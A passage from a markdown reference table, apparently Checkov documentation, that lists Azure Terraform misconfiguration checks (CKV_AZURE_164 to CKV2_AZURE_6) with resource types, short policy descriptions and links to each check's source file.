| Terraform | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRContainerScanEnabled.py) | -| 1418 | CKV_AZURE_164 | resource | azurerm_container_registry | Ensures that ACR uses signed/trusted images | Terraform | [ACRUseSignedImages.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRUseSignedImages.py) | -| 1419 | CKV_AZURE_165 | resource | azurerm_container_registry | Ensure geo-replicated container registries to match multi-region container deployments. | Terraform | [ACRGeoreplicated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRGeoreplicated.py) | -| 1420 | CKV_AZURE_166 | resource | azurerm_container_registry | Ensure container image quarantine, scan, and mark images verified | Terraform | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableImageQuarantine.py) | -| 1421 | CKV_AZURE_167 | resource | azurerm_container_registry | Ensure a retention policy is set to cleanup untagged manifests. | Terraform | [ACREnableRetentionPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableRetentionPolicy.py) | -| 1422 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | -| 1423 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster_node_pool | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. 
| Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | -| 1424 | CKV_AZURE_169 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets | Terraform | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSPoolTypeIsScaleSet.py) | -| 1425 | CKV_AZURE_170 | resource | azurerm_kubernetes_cluster | Ensure that AKS use the Paid Sku for its SLA | Terraform | [AKSIsPaidSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSIsPaidSku.py) | -| 1426 | CKV_AZURE_171 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster upgrade channel is chosen | Terraform | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUpgradeChannel.py) | -| 1427 | CKV_AZURE_172 | resource | azurerm_kubernetes_cluster | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters | Terraform | [AKSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSSecretStoreRotation.py) | -| 1428 | CKV_AZURE_173 | resource | azurerm_api_management | Ensure API management uses at least TLS 1.2 | Terraform | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementMinTLS12.py) | -| 1429 | CKV_AZURE_174 | resource | azurerm_api_management | Ensure API management public access is disabled | Terraform | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementPublicAccess.py) | -| 1430 | CKV_AZURE_175 | resource | azurerm_web_pubsub | Ensure Web PubSub uses a SKU with an SLA | Terraform | 
[PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSKUSLA.py) | -| 1431 | CKV_AZURE_176 | resource | azurerm_web_pubsub | Ensure Web PubSub uses managed identities to access Azure resources | Terraform | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSpecifyIdentity.py) | -| 1432 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | -| 1433 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine_scale_set | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | -| 1434 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | -| 1435 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine_scale_set | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | -| 1436 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1437 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | 
[VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1438 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1439 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1440 | CKV_AZURE_180 | resource | azurerm_kusto_cluster | Ensure that data explorer uses Sku with an SLA | Terraform | [DataExplorerSKUHasSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerSKUHasSLA.py) | -| 1441 | CKV_AZURE_181 | resource | azurerm_kusto_cluster | Ensure that data explorer/Kusto uses managed identities to access Azure resources securely. 
| Terraform | [DataExplorerServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerServiceIdentity.py) | -| 1442 | CKV_AZURE_182 | resource | azurerm_virtual_network | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | -| 1443 | CKV_AZURE_182 | resource | azurerm_virtual_network_dns_servers | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | -| 1444 | CKV_AZURE_183 | resource | azurerm_virtual_network | Ensure that VNET uses local DNS addresses | Terraform | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetLocalDNS.py) | -| 1445 | CKV_AZURE_184 | resource | azurerm_app_configuration | Ensure 'local_auth_enabled' is set to 'False' | Terraform | [AppConfigLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigLocalAuth.py) | -| 1446 | CKV_AZURE_185 | resource | azurerm_app_configuration | Ensure 'Public Access' is not Enabled for App configuration | Terraform | [AppConfigPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPublicAccess.py) | -| 1447 | CKV_AZURE_186 | resource | azurerm_app_configuration | Ensure App configuration encryption block is set. 
| Terraform | [AppConfigEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigEncryption.py) | -| 1448 | CKV_AZURE_187 | resource | azurerm_app_configuration | Ensure App configuration purge protection is enabled | Terraform | [AppConfigPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPurgeProtection.py) | -| 1449 | CKV_AZURE_188 | resource | azurerm_app_configuration | Ensure App configuration Sku is standard | Terraform | [AppConfigSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigSku.py) | -| 1450 | CKV_AZURE_189 | resource | azurerm_key_vault | Ensure that Azure Key Vault disables public network access | Terraform | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py) | -| 1451 | CKV_AZURE_190 | resource | azurerm_storage_account | Ensure that Storage blobs restrict public access | Terraform | [StorageBlobRestrictPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py) | -| 1452 | CKV_AZURE_191 | resource | azurerm_eventgrid_topic | Ensure that Managed identity provider is enabled for Azure Event Grid Topic | Terraform | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicIdentityProviderEnabled.py) | -| 1453 | CKV_AZURE_192 | resource | azurerm_eventgrid_topic | Ensure that Azure Event Grid Topic local Authentication is disabled | Terraform | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicLocalAuthentication.py) | -| 1454 | CKV_AZURE_193 | resource | azurerm_eventgrid_topic | Ensure public 
network access is disabled for Azure Event Grid Topic | Terraform | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicNetworkAccess.py) | -| 1455 | CKV_AZURE_194 | resource | azurerm_eventgrid_domain | Ensure that Managed identity provider is enabled for Azure Event Grid Domain | Terraform | [EventgridDomainIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainIdentityProviderEnabled.py) | -| 1456 | CKV_AZURE_195 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain local Authentication is disabled | Terraform | [EventgridDomainLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainLocalAuthentication.py) | -| 1457 | CKV_AZURE_196 | resource | azurerm_signalr_service | Ensure that SignalR uses a Paid Sku for its SLA | Terraform | [SignalRSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SignalRSKUSLA.py) | -| 1458 | CKV_AZURE_197 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN disables the HTTP endpoint | Terraform | [CDNDisableHttpEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNDisableHttpEndpoints.py) | -| 1459 | CKV_AZURE_198 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN enables the HTTPS endpoint | Terraform | [CDNEnableHttpsEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNEnableHttpsEndpoints.py) | -| 1460 | CKV_AZURE_199 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses double encryption | Terraform | [AzureServicebusDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusDoubleEncryptionEnabled.py) | -| 1461 | 
CKV_AZURE_200 | resource | azurerm_cdn_endpoint_custom_domain | Ensure the Azure CDN endpoint is using the latest version of TLS encryption | Terraform | [CDNTLSProtocol12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNTLSProtocol12.py) | -| 1462 | CKV_AZURE_201 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses a customer-managed key to encrypt data | Terraform | [AzureServicebusHasCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusHasCMK.py) | -| 1463 | CKV_AZURE_202 | resource | azurerm_servicebus_namespace | Ensure that Managed identity provider is enabled for Azure Service Bus | Terraform | [AzureServicebusIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusIdentityProviderEnabled.py) | -| 1464 | CKV_AZURE_203 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus Local Authentication is disabled | Terraform | [AzureServicebusLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusLocalAuthDisabled.py) | -| 1465 | CKV_AZURE_204 | resource | azurerm_servicebus_namespace | Ensure 'public network access enabled' is set to 'False' for Azure Service Bus | Terraform | [AzureServicebusPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusPublicAccessDisabled.py) | -| 1466 | CKV_AZURE_205 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus is using the latest version of TLS encryption | Terraform | [AzureServicebusMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusMinTLSVersion.py) | -| 1467 | CKV_AZURE_206 | resource | azurerm_storage_account | Ensure that Storage Accounts use replication | Terraform | 
[StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsUseReplication.py) | -| 1468 | CKV_AZURE_207 | resource | azurerm_search_service | Ensure Azure Cognitive Search service uses managed identities to access Azure resources | Terraform | [AzureSearchManagedIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchManagedIdentity.py) | -| 1469 | CKV_AZURE_208 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for index updates | Terraform | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAIndex.py) | -| 1470 | CKV_AZURE_209 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for search index queries | Terraform | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAQueryUpdates.py) | -| 1471 | CKV_AZURE_210 | resource | azurerm_search_service | Ensure Azure Cognitive Search service allowed IPS does not give public Access | Terraform | [AzureSearchAllowedIPsNotGlobal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchAllowedIPsNotGlobal.py) | -| 1472 | CKV_AZURE_211 | resource | azurerm_service_plan | Ensure App Service plan suitable for production use | Terraform | [AppServiceSkuMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSkuMinimum.py) | -| 1473 | CKV_AZURE_212 | resource | azurerm_service_plan | Ensure App Service has a minimum number of instances for failover | Terraform | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceInstanceMinimum.py) | -| 1474 | CKV_AZURE_213 | resource | 
azurerm_app_service | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | -| 1475 | CKV_AZURE_213 | resource | azurerm_linux_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | -| 1476 | CKV_AZURE_213 | resource | azurerm_windows_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | -| 1477 | CKV_AZURE_214 | resource | azurerm_linux_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | -| 1478 | CKV_AZURE_214 | resource | azurerm_windows_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | -| 1479 | CKV_AZURE_215 | resource | azurerm_api_management_backend | Ensure API management backend uses https | Terraform | [APIManagementBackendHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementBackendHTTPS.py) | -| 1480 | CKV_AZURE_216 | resource | azurerm_firewall | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Terraform | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDenyThreatIntelMode.py) | -| 1481 | CKV_AZURE_217 | resource | azurerm_application_gateway | Ensure Azure Application gateways listener that allow 
connection requests over HTTP | Terraform | [AppGWUsesHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUsesHttps.py) | -| 1482 | CKV_AZURE_218 | resource | azurerm_application_gateway | Ensure Application Gateway defines secure protocols for in transit communication | Terraform | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWDefinesSecureProtocols.py) | -| 1483 | CKV_AZURE_219 | resource | azurerm_firewall | Ensure Firewall defines a firewall policy | Terraform | [AzureFirewallDefinesPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDefinesPolicy.py) | -| 1484 | CKV_AZURE_220 | resource | azurerm_firewall_policy | Ensure Firewall policy has IDPS mode as deny | Terraform | [AzureFirewallPolicyIDPSDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallPolicyIDPSDeny.py) | -| 1485 | CKV_AZURE_221 | resource | azurerm_linux_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1486 | CKV_AZURE_221 | resource | azurerm_linux_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1487 | CKV_AZURE_221 | resource | azurerm_windows_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1488 | 
CKV_AZURE_221 | resource | azurerm_windows_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1489 | CKV_AZURE_222 | resource | azurerm_linux_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | -| 1490 | CKV_AZURE_222 | resource | azurerm_windows_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | -| 1491 | CKV_AZURE_223 | resource | azurerm_eventhub_namespace | Ensure Event Hub Namespace uses at least TLS 1.2 | Terraform | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceMinTLS12.py) | -| 1492 | CKV_AZURE_224 | resource | azurerm_mssql_database | Ensure that the Ledger feature is enabled on database that requires cryptographic proof and nonrepudiation of data integrity | Terraform | [SQLDatabaseLedgerEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseLedgerEnabled.py) | -| 1493 | CKV_AZURE_225 | resource | azurerm_service_plan | Ensure the App Service Plan is zone redundant | Terraform | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePlanZoneRedundant.py) | -| 1494 | CKV_AZURE_226 | resource | azurerm_kubernetes_cluster | Ensure ephemeral disks are used for OS disks | Terraform | 
[AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEphemeralOSDisks.py) | -| 1495 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | -| 1496 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster_node_pool | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | -| 1497 | CKV_AZURE_228 | resource | azurerm_eventhub_namespace | Ensure the Azure Event Hub Namespace is zone redundant | Terraform | [EventHubNamespaceZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceZoneRedundant.py) | -| 1498 | CKV_AZURE_229 | resource | azurerm_mssql_database | Ensure the Azure SQL Database Namespace is zone redundant | Terraform | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseZoneRedundant.py) | -| 1499 | CKV_AZURE_230 | resource | azurerm_redis_cache | Standard Replication should be enabled | Terraform | [RedisCacheStandardReplicationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheStandardReplicationEnabled.py) | -| 1500 | CKV_AZURE_231 | resource | azurerm_app_service_environment_v3 | Ensure App Service Environment is zone redundant | Terraform | 
[AppServiceEnvironmentZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnvironmentZoneRedundant.py) | -| 1501 | CKV_AZURE_232 | resource | azurerm_kubernetes_cluster | Ensure that only critical system pods run on system nodes | Terraform | [AKSOnlyCriticalPodsOnSystemNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSOnlyCriticalPodsOnSystemNodes.py) | -| 1502 | CKV_AZURE_233 | resource | azurerm_container_registry | Ensure Azure Container Registry (ACR) is zone redundant | Terraform | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableZoneRedundancy.py) | -| 1503 | CKV_AZURE_234 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender for cloud is set to On for Resource Manager | Terraform | [AzureDefenderDisabledForResManager.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderDisabledForResManager.py) | -| 1504 | CKV_AZURE_235 | resource | azurerm_container_group | Ensure that Azure container environment variables are configured with secure values only | Terraform | [AzureContainerInstanceEnvVarSecureValueType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerInstanceEnvVarSecureValueType.py) | -| 1505 | CKV_AZURE_237 | resource | azurerm_container_registry | Ensure dedicated data endpoints are enabled. 
| Terraform | [ACRDedicatedDataEndpointEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRDedicatedDataEndpointEnabled.py) | -| 1506 | CKV2_AZURE_1 | resource | azurerm_storage_account | Ensure storage for critical data are encrypted with Customer Managed Key | Terraform | [StorageCriticalDataEncryptedCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml) | -| 1507 | CKV2_AZURE_2 | resource | azurerm_mssql_server_security_alert_policy | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | -| 1508 | CKV2_AZURE_2 | resource | azurerm_sql_server | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | -| 1509 | CKV2_AZURE_3 | resource | azurerm_mssql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 1510 | CKV2_AZURE_3 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 1511 | CKV2_AZURE_3 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | 
[VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 1512 | CKV2_AZURE_3 | resource | azurerm_sql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 1513 | CKV2_AZURE_4 | resource | azurerm_mssql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 1514 | CKV2_AZURE_4 | resource | azurerm_mssql_server_security_alert_policy | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 1515 | CKV2_AZURE_4 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 1516 | CKV2_AZURE_4 | resource | azurerm_sql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 1517 | CKV2_AZURE_5 | resource | azurerm_mssql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | 
[VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 1518 | CKV2_AZURE_5 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 1519 | CKV2_AZURE_5 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 1520 | CKV2_AZURE_5 | resource | azurerm_sql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 1521 | CKV2_AZURE_6 | resource | azurerm_sql_firewall_rule | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | -| 1522 | CKV2_AZURE_6 | resource | azurerm_sql_server | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | 
